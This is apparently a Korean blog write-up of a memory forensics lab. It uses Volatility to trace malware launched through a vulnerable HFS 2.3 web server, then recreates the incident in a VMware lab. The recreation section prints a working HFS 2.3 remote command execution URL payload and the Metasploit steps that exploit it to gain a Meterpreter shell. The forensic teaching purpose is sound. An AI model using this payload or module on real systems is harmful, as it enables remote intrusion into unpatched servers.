메모리 포렌식 Challenge 6 , metasploit

 

 

 

 

\

vol.exe -f 6.raw imageinfo

▲ 프로세스 기초 분석

- --profile=Win7SP1x32

 

 

 

 

 

vol.exe -f 6.raw --profile=Win7SP1x86  pstree

 

- pstree : hfs-wscript-KrpiupKHRF0Lo-cmd 가 수상하다. hfs는 http file server로

2.3 버전에 원격코드 실행 취약점이 있다.

 

좀 말이안되게 의심이간다 부모도 존재하지않으면서 수상하다.

 

 

 

 

vol.exe -f 6.raw --profile=Win7SP1x86 userassist

여기선 별개 나오지않았고

 

 

 

 

 

vol.exe -f 6.raw --profile=Win7SP1x86 malfind

 

1600에 실행파일이 숨어져잇으며

 

 

 

 

 

 

 

 

 

 

의심가는 파일 전부 덤프를 떠보게된다면

vol.exe -f 6.raw --profile=Win7SP1x86 memdump -p 2860,700,1600,4564 --dump-dir=./

 

 

 

 

 

1600(KrpiupKRf0Lo.)은 바이러스가 검출되었고

 

 

2860.dmp(hfs)은 검출되지않았고

700.dmp(wscript)도 검출되지않앗고

 

4564.dmp (cmd)는 검출되지않았습니다.

 

 

1600에 문제가 있다는 것을 확인할 수 있었습니다.

 

 

 

 

 

 

 

vol.exe -f 6.raw --profile=Win7SP1x86 procdump -p 2860,700,1600,4564 --dump-dir=./

 

한번 열어 보게되면 이런게나왔고 열어보니까

 

1600 은 완전한 바이러스였고

 

검사해보면 바이러스였습니다.

 

 

 

 

 

==============================================

 

 

 

 

 

 

 

이뒤에 실습환경을 이용하여

 

 

 

 

 

 

칼리리눅스, window 7을 가상환경을 vmware로 킨뒤에

 

 

 

(ping이 둘다 통하게 방화벽도 끄고진행을합니다)

 

rfs.exe를 윈도우 7에 넣어두고나서

 

(안된다면 vmware tool 설치를 하면 

 

 

 

 

 

 

▲ 침해사고 구현

- win7에서 hfs.exe 를 실행하고, 원격으로 접속

 

 

 

 

rfs 를 실행하고

 

192.168.1.66으로 접속을 합니다.

 

 

이런식으로 진행을 합니다

 

 

hfs 2.3을 검색을하니까 remote command 취약점 분석등 

원격명령실행 취약점이 있다고 찾을수가있습니다.

 

 

 

 

 

 

- 원격으로 위 명령어를 실행하면 hfs 서버에서 cmd창이 여러개 실행된다.

 

- hfs 2.3 exploit 을 검색하면 관련된 예제 코드를 확인할 수 있다.

http://192.168.0.66/?search=%00{.exec|cmd.}

 

 cmd 창을 실행하는 원격 명령어입니다. 이걸실행하게된다면 cmd창이 window7에서

원격으로 cmd창을 여러개 진행을 합니다.

이렇게 원격으로 진행을 할수가있습니다.

 

 

이제 다음으로

 

 

 

 

 

 

=========================

 

 

 이 취약점을이용해

 

칼리-> window7의

 

미터프리터 권한 테스트를 해보면

 

 

 

 

 

 msfconsole 

 

 

 

 

search hfs

 

 

use exploit/windows/http/rejetto_hfs_exec

 

show options

 

set RHOSTS 192.168.1.66

 (window7 ip)

 

 

 

 

 

exploit을

 

하게되면

 

- msfconsole 에서 hfs 모듈로 공격을 수행하면 metepreter shell을 획득

 

 

 

jmoon.co.kr/77

DumpIt 다운로드/ 사용법

 

이곳에서

 

dumpit 을 다운로드한뒤에 압축을 풀고나서

 

exe파일을

 

 

 

윈도우 7에 넣어준뒤에

열고나서

 

 

y를 눌러주면 dump 가 진행이되고

 

 

 

이렇게 window7을 덤프한 raw 파일이 생겼습니다.

 

 

이파일을 window10 으로 가져와 volatillity로  분석을하게되면

 

 

vo1.exe -f 12341234.raw imageinfo

 

 

vol.exe -f 12341234.raw --profile=Win79SP1x86 pstree

를 하게되면

 

결국엔 우리가 원격실행하는 코드를 썻던

 

원격 cmd창 실행한것이

 

메모리 덤프를 했을때

 

우리가 분석했던 취약점과 매우 유사한 결과들이 나왔습니다,

 

 

hts 2.3버전 취약점을 이용해

 

window7 cmd 창 원격실행후

 

칼리리눅스 meterpreter 권한 얻고

 

메모리덤프 진행후 

volatillity로 분석을 마지막으로 진행해봤습니다. 

 

 

▲ 변조된 프로세스 분석

- Krpiup는 악성코드로 확인된다.

- 관련 자료 검색결과 wscript.exe 자체는 악성파일이 아니나, 변조될 가능성이 높은

프로세스임을 알 수 있다.

- 따라서 wscript가 사용하는 모든 메모리 공간을 dump 하면 cmd로 Krpiup.exe를

실행하는 코드를 확인 가능

- 직접 ftk imager로 메모리 dump하여 분석시 --profile=Win7SPx64로 지정